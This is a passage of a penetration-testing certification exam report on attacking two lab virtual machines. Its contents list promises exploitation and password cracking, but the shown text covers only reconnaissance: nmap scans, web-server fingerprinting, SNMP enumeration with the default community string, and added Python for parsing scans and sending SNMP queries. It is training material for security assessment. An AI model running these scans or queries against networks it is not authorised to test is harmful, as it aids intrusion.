Certified Penetration Tester (CPT)

Practical Examination Report

Matthew Tiedeman
mtiedeman@gmail.com
February 21st, 2009

Contents
1. Overview
2. Assumptions
3. Tools
4. Penetration test details
   A. Scanning
      i. Baseline scan of network
      ii. Port scanning and OS fingerprinting
      iii. Service fingerprinting - TCP services
      iv. Service fingerprinting - Validation of Apache HTTP service
      v. SNMP enumeration
      vi. Service fingerprinting - UDP services
   B. Sites used during the exploit research phase
   C. Remote exploits
      i. Research via anyside.org
      ii. Exploits round 1
      iii. Research via secwatch.org
      iv. Exploits round 2
   D. User discovery
      i. Abuse of finger
   E. Brute force password guessing
      i. Discovery of password for user account
      ii. Discovery of password for cptvm1 and cptvm2 accounts
   F. Research of cptvm1 and cptvm2 hosts
      i. cptvm1
      ii. cptvm2
   G. Penetration of cptvm1
      i. Local exploit research via anyside.org
      ii. Local exploit research via secwatch.org
      iii. Privilege escalation using a Kernel VMA exploit
      iv. Maintaining access via creation of a new r00t account
      v. Gathering the shadow password file
   H. Cracking passwords of the cptvm1 host
      i. Cracking of user, cptvm1 and cptvm2
   I. Penetration of cptvm2
      i. Privilege escalation using a Kernel vmsplice exploit
      ii. Maintaining access via creation of a new r00t account
      iii. Gathering the shadow password file
   J. Cracking passwords of the cptvm2 host
      i. Cracking of cptvm1, cptvm2, root and r00t
   K. Cracking passwords of the cptvm1 host round 2
      i. Cracking of root and r00t
   L. Ultimate goal
      i. cptvm1 and cptvm2 hosts compromised
      ii. Passwords for root accounts on cptvm1 and cptvm2
   M. Lessons learned
      i. Searching exploit sites
      ii. Attack vectors
5. Appendix
   A. Source code for the Kernel 2.4 VMA exploit
   B. Source code for the Kernel 2.6 vmsplice exploit

1. Overview

The Certified Penetration Tester practical examination consists of compromising
two VMware virtual machines, recovering the root password of each system and
writing a penetration test report.

The report must contain, at a minimum, the details of all penetration test
findings and a prioritized list of the vulnerabilities discovered. It is
submitted for review to:
exams@iacertification.org

The following information was provided as part of the examination
documentation:
- Virtual machine 1 (cptvm1): a VM containing a Linux system.
  - The system has the following static configuration:
    - IP address: 192.168.1.200
    - Netmask: 255.255.255.0
    - Gateway: 192.168.1.254
    - DNS: 192.168.1.254
- Virtual machine 2 (cptvm2): a VM containing a Linux system.
  - The system is configured to obtain its network information via DHCP.
- Information gathered from one VM during the penetration test may be
  required in order to compromise the other VM.

2. Assumptions
- While the penetration testing process consists of five phases
  (reconnaissance, scanning, penetration, maintaining access and covering
  tracks), the reconnaissance and covering-tracks phases are not covered in
  this report.
- Stealthy scanning and penetration techniques were not used.

3. Tools

The following tools were used during the completion of the penetration testing
practical examination.
- back|track3: collection of penetration tester utilities.
- VMware Fusion: VMware virtual host software for OS X.
- Apple OS X: host operating system used to run VMware Fusion.
- nmap: port scanning, fingerprinting, swiss-army-knife utility.
- httprint: HTTP fingerprinting utility.
- snmpenum.pl: SNMP enumeration utility.
- vi: text editor.
- emacs: a swiss-army-knife editor (text/source code/etc.).
- gcc: C (and other language) compiler.
- tftp: Trivial File Transfer Protocol client.
- ssh: Secure Shell client.
- finger: finger utility.
- bash shell scripting: small scripts and main interactive shell.
- sed: stream editing utility.
- awk: lightweight regular-expression text scripting utility.
- sort: Unix text sort utility.
- hydra: multi-protocol dictionary attack utility.
- aspell: dictionary utility.
- John the Ripper: password cracker.

4. Penetration test details


A. Scanning
i. Baseline scan of network
An initial ping sweep of the network was performed to establish a baseline of
the network configuration.
The gateway (192.168.1.1), the host computer (192.168.1.30), back|track3
(192.168.1.102), cptvm2 (192.168.1.104) and cptvm1 (192.168.1.200) were
identified. At this point the identification of the hosts and their roles
comes mainly from the exam documentation (cptvm1's static address of
192.168.1.200) and from knowledge of how the local network is configured;
the VMware OUI (00:0C:29) on the 192.168.1.104 MAC address is what ties that
DHCP-assigned address to cptvm2.
bt live # nmap -sP -n 192.168.1.1/24
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-19 07:59 GMT
Host 192.168.1.1 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Cisco-Linksys)
Host 192.168.1.30 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.102 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.104 appears to be up.
MAC Address: 00:0C:29:3B:43:BC (VMware)
Host 192.168.1.200 appears to be up.
MAC Address: 00:0C:29:27:60:0A (VMware)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.269 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
cptvm2 (192.168.1.104)

ii. Port scanning and OS fingerprinting


To determine the open ports and the host operating system, a port scan and
OS fingerprint of the two VM IP addresses was conducted. The port scan
covered all TCP ports from 1 to 65535. Because UDP scanning is far slower
(an open UDP port usually does not answer an empty probe, so nmap has to
wait for ICMP port-unreachable replies, which Linux rate-limits), the UDP
scan was limited to ports 1 to 1024.

Based upon the list of open ports, cptvm1 (192.168.1.200) is most likely a
server, while cptvm2 (192.168.1.104) is most likely a client workstation.
bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT      STATE SERVICE
7/tcp     open  echo
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
79/tcp    open  finger
80/tcp    open  http
109/tcp   open  pop2
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
199/tcp   open  smux
443/tcp   open  https
686/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
6000/tcp  open  X11
32768/tcp open  unknown
32770/tcp open  sometimes-rpc3
MAC Address: 00:0C:29:27:60:0A (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)
Network Distance: 1 hop
Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
939/tcp open  unknown
MAC Address: 00:0C:29:3B:43:BC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds
bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMT
Warning: Giving up on port early because retransmission cap hit.
Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)

Stats: 0:00:23 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan


UDP Scan Timing: About 25.05% done; ETC: 15:54 (0:01:08 remaining)
Interesting ports on 192.168.1.200:
Not shown: 870 open|filtered ports, 151 closed ports
PORT   STATE SERVICE
7/udp  open  echo
13/udp open  daytime
37/udp open  time
MAC Address: 00:0C:29:27:60:0A (VMware)
All 1024 scanned ports on 192.168.1.104 are open|filtered (872) or closed (152)
MAC Address: 00:0C:29:3B:43:BC (VMware)
Nmap done: 2 IP addresses (2 hosts up) scanned in 146.229 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: Linux 2.4.18 - 2.4.32
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
UDP ports: 7, 13, 37
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
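The per-host summaries in this report are transcribed from the nmap output by hand. The following Python script is an added example, not part of the original report: it parses nmap's normal (non -oG/-oX) output as captured here, builds the same per-host summary, and lists the ports that still need manual fingerprinting (tentative "?" matches, empty version strings, and open|filtered ports where nothing answered). The sample output embedded in it is constructed from the scans above; the function and field names are the example's own.

```python
import re

# Constructed sample: a trimmed, re-aligned copy of the Nmap 4.60 output shown above,
# with version strings from the -sV run and one UDP line to show the open|filtered case.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT      STATE         SERVICE VERSION
7/tcp     open          echo
21/tcp    open          ftp     vsftpd 1.1.3
22/tcp    open          ssh     OpenSSH 3.5p1 (protocol 1.99)
109/tcp   open          pop2?
6000/tcp  open          X11     (access denied)
123/udp   open|filtered ntp
MAC Address: 00:0C:29:27:60:0A (VMware)
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 4.3 (protocol 2.0)
111/tcp open  rpcbind 2 (rpc #100000)
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds
"""

# "Interesting ports on X:" is the Nmap 4.x header; newer releases print "Nmap scan report for X".
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for) (\S+?):?\s*$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
OS_RE = re.compile(r"^OS details: (.*)$")


def parse_nmap(text):
    """Return {ip: {"os": str|None, "tcp": [ports], "udp": [ports], "services": {...}}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {"os": None, "tcp": [], "udp": [], "services": {}})
            continue
        if current is None:
            continue
        m = OS_RE.match(line)
        if m:
            current["os"] = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and m.group(3).startswith("open"):   # keep open and open|filtered, drop closed/filtered
            port, proto, state, service, version = m.groups()
            current[proto].append(int(port))
            current["services"][f"{port}/{proto}"] = {
                "state": state,
                "service": service.rstrip("?"),
                "guessed": service.endswith("?"),   # nmap appends '?' when the match is tentative
                "version": (version or "").strip(),
            }
    return hosts


def needs_followup(hosts):
    """Ports that still need manual fingerprinting: tentative service match, no version
    string, or an open|filtered state where nothing actually answered the probes."""
    return [f"{ip}:{key}" for ip, h in hosts.items() for key, svc in h["services"].items()
            if svc["guessed"] or not svc["version"] or "|" in svc["state"]]


def summarise(hosts):
    """Render the per-host summary block used throughout this report."""
    out = []
    for ip, h in hosts.items():
        out.append(ip)
        out.append(f"  Kernel version: {h['os'] or 'unknown'}")
        out.append(f"  TCP ports: {', '.join(map(str, h['tcp'])) or 'none'}")
        out.append(f"  UDP ports: {', '.join(map(str, h['udp'])) or 'none'}")
        for key, svc in h["services"].items():
            name = svc["service"] + (" (guess)" if svc["guessed"] else "")
            out.append(f"  {key:<11}{name:<16}{svc['version']}".rstrip())
    return "\n".join(out)


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP_OUTPUT)
    print(summarise(parsed))
    print("Needs follow-up:", ", ".join(needs_followup(parsed)))
```

For anything beyond a one-off, use nmap's -oX output and an XML parser instead: the text format is not stable between releases (the "Interesting ports on" header seen above became "Nmap scan report for" in later versions).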

iii. Service fingerprinting - TCP services


Because a TCP port number does not by itself identify a service, the
services listening on the open ports were fingerprinted with nmap's version
detection. The majority of the TCP services were identified. nmap marks
three with a trailing "?", meaning only a tentative match: port 109 (pop2?),
port 993 (imaps?) and port 995 (pop3s?). These will require further research
to fingerprint properly. Note, however, that the raw fingerprint nmap prints
for port 109 already contains the banner "+ POP2 [192.168.1.200] v2001.63rh
server ready", which identifies the listener as a POP2 daemon of the same
Red Hat-packaged UW IMAP family as the ipopd (port 110) and UW Imapd (port
143) found below; ports 993 and 995 are the SSL-wrapped counterparts of imap
and pop3 and can be confirmed by connecting through an SSL client.
bt live # nmap -sV --version-all -n -p7,21-23,79,80,109-111,143,199,443,686,993,995,6000,32768,32770 192.168.1.200
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:27 GMT
Interesting ports on 192.168.1.200:
PORT      STATE SERVICE  VERSION
7/tcp     open  echo
21/tcp    open  ftp      vsftpd 1.1.3
22/tcp    open  ssh      OpenSSH 3.5p1 (protocol 1.99)
23/tcp    open  telnet   Linux telnetd
79/tcp    open  finger   Linux fingerd
80/tcp    open  http     Apache httpd 2.0.40 ((Red Hat Linux))
109/tcp   open  pop2?
110/tcp   open  pop3     ipopd 2001.78rh
111/tcp   open  rpcbind  2 (rpc #100000)
143/tcp   open  imap     UW Imapd 2001.315rh
199/tcp   open  smux     Linux SNMP multiplexer
443/tcp   open  ssl/http Apache httpd 2.0.40 ((Red Hat Linux))
686/tcp   open  rquotad  1-2 (rpc #100011)
993/tcp   open  imaps?
995/tcp   open  pop3s?
6000/tcp  open  X11      (access denied)
32768/tcp open  status   1 (rpc #100024)
32770/tcp open  mountd   1-3 (rpc #100005)
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port109-TCP:V=4.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(Gener
SF:icLines,4B,"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server
SF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier,60,
SF:"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server\x20ready\r
SF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIB
SF:E\r\n");
MAC Address: 00:0C:29:27:60:0A (VMware)
Service Info: Host: 192.168.1.200; OSs: Unix, Linux
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.977 seconds
bt live # nmap -sV --version-all -n -p22,111,939 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:33 GMT
Interesting ports on 192.168.1.104:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 4.3 (protocol 2.0)
111/tcp open  rpcbind 2 (rpc #100000)
939/tcp open  status  1 (rpc #100024)
MAC Address: 00:0C:29:3B:43:BC (VMware)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.358 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: Linux 2.4.18 - 2.4.32
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
UDP ports: 7, 13, 37
TCP services:
7/tcp      echo
21/tcp     ftp            vsftpd 1.1.3
22/tcp     ssh            OpenSSH 3.5p1 (protocol 1.99)
23/tcp     telnet         Linux telnetd
79/tcp     finger         Linux fingerd
80/tcp     http           Apache httpd 2.0.40 (Red Hat Linux)
109/tcp    POSSIBLY pop2
110/tcp    pop3           ipopd 2001.78rh
111/tcp    rpcbind        2 (rpc #100000)
143/tcp    imap           UW Imapd 2001.315rh
199/tcp    smux           Linux SNMP multiplexer
443/tcp    ssl/http       Apache httpd 2.0.40 (Red Hat Linux)
686/tcp    rquotad        1-2 (rpc #100011)
993/tcp    imaps
995/tcp    pop3s
6000/tcp   X11
32768/tcp  status         1 (rpc #100024)
32770/tcp  mountd         1-3 (rpc #100005)
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp     ssh            OpenSSH 4.3 (protocol 2.0)
111/tcp    rpcbind        2 (rpc #100000)
939/tcp    status         1 (rpc #100024)
iv. Service fingerprinting - Validation of Apache HTTP service


Web server banners are often altered to disguise the server that is actually
running, so the httprint utility was used to check that the web server is
really Apache. httprint compares the server's HTTP behaviour (header order,
handling of malformed requests and so on) against a signature database
instead of trusting the Server header.
In this case the use of Apache was validated: the best-scoring signature is
Apache/2.0.x (score 106, confidence 63.86), consistent with the reported
banner Apache/2.0.40 (Red Hat Linux).
bt linux # httprint -h 192.168.1.200 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
httprint@net-square.com
Finger Printing on http://192.168.1.200:80/
Finger Printing Completed on http://192.168.1.200:80/
-------------------------------------------------
Host: 192.168.1.200
Derived Signature:
Apache/2.0.40 (Red Hat Linux)
9E431BC86ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC5
0D7645B5811C9DC52A200B4CCD37187C11DDC7D7811C9DC5811C9DC58A91CF57
FCCC535BE2CE6920FCCC535B811C9DC5E2CE6927050C5D33E2CE69279E431BC8
6ED3C295E2CE69262A200B4CE2CE6920E2CE6920E2CE6920E2CE6920E2CE6923
E2CE6923E2CE6920811C9DC5E2CE6927E2CE6923
Banner Reported: Apache/2.0.40 (Red Hat Linux)
Banner Deduced: Apache/2.0.x
Score: 106
Confidence: 63.86
-----------------------
Scores:
Apache/2.0.x: 106 63.86
Apache/1.3.27: 101 53.96
Apache/1.3.[4-24]: 101 53.96
Apache/1.3.26: 100 52.11
Apache/1.3.[1-3]: 96 45.12
TUX/2.0 (Linux): 89 34.42
Apache/1.2.6: 86 30.39
Agranat-EmWeb: 76 19.19
Orion/2.0x: 73 16.45
Microsoft-IIS/6.0: 69 13.20
Stronghold/4.0-Apache/1.3.x: 68 12.45
Apache-Tomcat/4.1.29: 67 11.74
Lotus-Domino/6.x: 65 10.38
AssureLogic/2.0: 64 9.74
Oracle Servlet Engine: 58 6.41
RomPager/4.07 UPnP/1.0: 54 4.64
cisco-IOS: 54 4.64
Netscape-Enterprise/6.0: 53 4.25
Netscape-Enterprise/4.1: 53 4.25
AkamaiGHost: 50 3.19
CompaqHTTPServer/1.0: 47 2.30
HP-ChaiServer/3.0: 46 2.04
Microsoft-IIS/5.0: 44 1.56
Microsoft-IIS/5.0 ASP.NET: 44 1.56
Microsoft-IIS/5.1: 44 1.56
Netscape-Enterprise/3.5.1G: 44 1.56
Com21 Cable Modem: 44 1.56
thttpd: 44 1.56
Lexmark Optra Printer: 44 1.56
Boa/0.94.11: 44 1.56
WebSitePro/2.3.18: 44 1.56
Stronghold/2.4.2-Apache/1.3.x: 43 1.34
Xerver_v3: 43 1.34
ServletExec: 41 0.96
Zope/2.6.0 ZServer/1.1b1: 41 0.96
WebLogic XMLX Module 8.1: 41 0.96
Microsoft ISA Server (external): 40 0.79
Jetty (unverified): 40 0.79
IDS-Server/3.2.2: 38 0.48
CompaqHTTPServer/4.2: 23 0.45
squid/2.5.STABLE5: 23 0.45
SunONE WebServer 6.0: 22 0.45
JRun Web Server: 22 0.45
Microsoft-IIS/URLScan: 21 0.44
NetWare-Enterprise-Web-Server/5.1: 24 0.44
TightVNC: 24 0.44
Linksys WRTP54G: 24 0.44
GWS/2.1 Google Web Server: 24 0.44
Netscape-Enterprise/3.6: 20 0.43
MiniServ/0.01 Webmin: 20 0.43
fnord: 20 0.43
MiniServ/0.01: 20 0.43
Tcl-Webserver/3.4.2: 20 0.43
Zeus/4.0: 25 0.43
Hewlett Packard xjet: 25 0.43
HP Jet-Direct Print Server: 25 0.43
Resin/3.0.8: 19 0.42
RealVNC/4.0: 26 0.41
WebLogic Server 8.x: 27 0.39
WebLogic Server 8.1: 27 0.39
Linksys with Talisman firmware: 27 0.39
Oracle XML DB/Oracle9i: 17 0.38
Microsoft-IIS/5.0 Virtual Host: 17 0.38
Adaptec ASM 1.1: 17 0.38
Linksys AP2: 28 0.36
BaseHTTP/0.3 Python/2p3.3 edna/0.4: 28 0.36
Lotus-Domino/5.x: 15 0.33
Netscape-Enterprise/3.6 SP2: 29 0.32
Netscape-Enterprise/3.5.1: 14 0.30
EHTTP/1.1: 14 0.30
Tomcat Web Server/3.2.3: 14 0.30
Surgemail webmail (DManager): 14 0.30
Jetty/4.2.2: 30 0.27
Netscape-Enterprise/4.1: 12 0.25
Zeus/4.1: 36 0.23
Intel NetportExpressPro/1.0: 36 0.23
Cisco-HTTP: 11 0.22
Cisco Pix 6.2: 11 0.22
AOLserver/3.4.2-3.5.1: 31 0.21
Jana Server/1.45: 31 0.21
EMWHTTPD/1.0: 31 0.21
Ipswitch-IMail/8.12: 31 0.21
RemotelyAnywhere: 10 0.19
3Com/v1.0: 10 0.19
Microsoft ISA Server (internal): 10 0.19
Allied Telesyn Ethernet switch: 10 0.19
WebSENSE/1.0: 10 0.19
Netgear MR814v2 - IP_SHARER WEB 1.0: 10 0.19
MikroTik RouterOS: 35 0.12
Zeus/4_2: 33 0.07
CompaqHTTPServer-SSL/4.2: 33 0.07
Microsoft-IIS/4.0: 34 0.02
Domino-Go-Webserver/4.6.2.8: 34 0.02
AOLserver/3.5.6: 34 0.02
dwhttpd (Sun Answerbook): 34 0.02
SMC Wireless Router 7004VWBR: 34 0.02
Belkin Wireless router: 34 0.02
VisualRoute 2005 Server Edition: 34 0.02
JC-HTTPD/1.14.18: 34 0.02
Ubicom/1.1: 2 0.01
Ubicom/1.1 802.11b: 2 0.01
Tanberg 880 video conf: 2 0.01
Snap Appliances, Inc./3.x: 1 0.00
Linksys AP1: 0 0.00
Linksys Router: 0 0.00
Linksys Print Server: 0 0.00
NetBuilderHTTPDv0.1: 0 0.00
NetPort Software 1.1: 0 0.00
Linksys BEFSR41/BEFSR11/BEFSRU31: 0 0.00
MailEnable-HTTP/5.0: 0 0.00

v. SNMP enumeration
The SNMP multiplexer (smux) service on port 199/tcp of the cptvm1 host,
192.168.1.200, indicates that an SNMP agent is running, and the cptvm1 host
OS was identified as Linux. With these two factors in mind, the snmpenum.pl
utility was run against the agent using the default community string
"public" and its Linux OID template (linux.txt) to gather system
information. Of particular interest are the UDP services running on the
host, since the UDP scan left most ports as open|filtered.
Along with UDP ports 7, 13, 37, 111, 123, 161, 162, 631 and 683, the exact
kernel version (2.4.20-8, which narrows the 2.4.18 - 2.4.32 range nmap
guessed), process, mount and listening-port information was disclosed.
bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt
----------------------------------------
UPTIME
----------------------------------------
1 hour, 40:22.46
----------------------------------------
HOSTNAME
----------------------------------------
cptvm1
----------------------------------------
RUNNING SOFTWARE PATHS
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
----------------------------------------
RUNNING PROCESSES
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
----------------------------------------
MOUNTPOINTS
----------------------------------------
/
/proc/bus/usb
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers
----------------------------------------
SYSTEM INFO
----------------------------------------
Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686
----------------------------------------
LISTENING UDP PORTS
----------------------------------------
7
13
37
111
123
161
162
631
683
----------------------------------------
LISTENING TCP PORTS
----------------------------------------
7
21
22
23
79
80
109
110
111
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
7/tcp      echo
21/tcp     ftp            vsftpd 1.1.3
22/tcp     ssh            OpenSSH 3.5p1 (protocol 1.99)
23/tcp     telnet         Linux telnetd
79/tcp     finger         Linux fingerd
80/tcp     http           Apache httpd 2.0.40 (Red Hat Linux)
109/tcp    POSSIBLY pop2
110/tcp    pop3           ipopd 2001.78rh
111/tcp    rpcbind        2 (rpc #100000)
143/tcp    imap           UW Imapd 2001.315rh
199/tcp    smux           Linux SNMP multiplexer
443/tcp    ssl/http       Apache httpd 2.0.40 (Red Hat Linux)
686/tcp    rquotad        1-2 (rpc #100011)
993/tcp    imaps
995/tcp    pop3s
6000/tcp   X11
32768/tcp  status         1 (rpc #100024)
32770/tcp  mountd         1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp     ssh            OpenSSH 4.3 (protocol 2.0)
111/tcp    rpcbind        2 (rpc #100000)
939/tcp    status         1 (rpc #100024)
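snmpenum.pl hides the protocol work behind its OID template. The following Python is an added example, not part of the original report or of snmpenum.pl: it builds the SNMPv1 GetRequest for sysDescr.0 with the default community "public" byte by byte (the BER encoding of the SNMP message), decodes a GetResponse back into its varbinds, and wraps the two in a live query over UDP/161. The reply decoded here is constructed with the same encoder to stand in for cptvm1's answer, using the SYSTEM INFO line snmpenum printed above; the request id and all function names are the example's own.

```python
import socket

# --- BER encoding primitives (the subset SNMPv1 uses) ---

def ber_len(n):
    """Definite-length field: one byte below 0x80, otherwise 0x80|count followed by the length."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload

def ber_int(v):
    # minimal two's-complement body; the +8 keeps a leading zero byte when the top bit is set
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def ber_str(s):
    return tlv(0x04, s.encode())

def ber_null():
    return tlv(0x05, b"")

def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))

GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2
SYSDESCR_OID = "1.3.6.1.2.1.1.1.0"   # sysDescr.0, the uname line snmpenum printed above

def snmp_v1_message(community, pdu_tag, request_id, varbinds):
    """Message ::= SEQ { version INTEGER 0, community OCTET STRING, PDU { id, err, idx, SEQ of varbinds } }."""
    vbl = b"".join(tlv(0x30, ber_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, vbl))
    return tlv(0x30, ber_int(0) + ber_str(community) + pdu)

# --- decoding ---

def ber_decode(buf):
    """Decode the TLV at the head of buf -> (tag, value, rest). Constructed types (bit 5 set)
    yield a list of (tag, value) children; primitives yield their raw bytes."""
    tag, first = buf[0], buf[1]
    if first < 0x80:
        length, pos = first, 2
    else:
        n = first & 0x7F
        length, pos = int.from_bytes(buf[2:2 + n], "big"), 2 + n
    body, rest = buf[pos:pos + length], buf[pos + length:]
    if tag & 0x20:
        children = []
        while body:
            t, v, body = ber_decode(body)
            children.append((t, v))
        return tag, children, rest
    return tag, body, rest

def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_get_response(packet):
    """Return (request_id, error_status, {oid: raw value bytes}) from a GetResponse message."""
    tag, msg, _ = ber_decode(packet)
    if tag != 0x30 or len(msg) != 3 or msg[2][0] != GET_RESPONSE:
        raise ValueError("not an SNMPv1 GetResponse")
    req_id, err_status, _err_index, varbinds = msg[2][1]
    results = {}
    for _, varbind in varbinds[1]:          # each varbind is SEQ { OID, value }
        (_, oid), (_, value) = varbind
        results[decode_oid(oid)] = value
    to_int = lambda raw: int.from_bytes(raw, "big", signed=True)
    return to_int(req_id[1]), to_int(err_status[1]), results

def build_sysdescr_request(community="public", request_id=0x1234):
    return snmp_v1_message(community, GET_REQUEST, request_id, [(SYSDESCR_OID, ber_null())])

# Constructed stand-in for the agent's reply, built with the same encoder; the string is the
# SYSTEM INFO line snmpenum reported for cptvm1 above.
CONSTRUCTED_REPLY = snmp_v1_message("public", GET_RESPONSE, 0x1234, [
    (SYSDESCR_OID, ber_str("Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686")),
])

def query_sysdescr(host, community="public", timeout=2.0):
    """Live query over UDP/161 (network use, not exercised offline); returns the sysDescr string."""
    req = build_sysdescr_request(community)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(req, (host, 161))
        data, _ = s.recvfrom(65535)
    req_id, err, results = parse_get_response(data)
    if req_id != 0x1234 or err != 0:
        raise ValueError(f"bad reply: id={req_id} error-status={err}")
    return results[SYSDESCR_OID].decode(errors="replace")

if __name__ == "__main__":
    print("request :", build_sysdescr_request().hex())
    print("response:", parse_get_response(CONSTRUCTED_REPLY))
```

Nothing in this exchange authenticates the requester: in SNMPv1 the community string travels in clear text and is the only credential, which is why a readable "public" community hands out the process list, mounts and listening ports shown above to anyone on the network.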

vi. Service fingerprinting - UDP services


Like TCP ports, UDP ports do not directly identify services, so the UDP ports
disclosed by SNMP were fingerprinted with nmap's version detection.
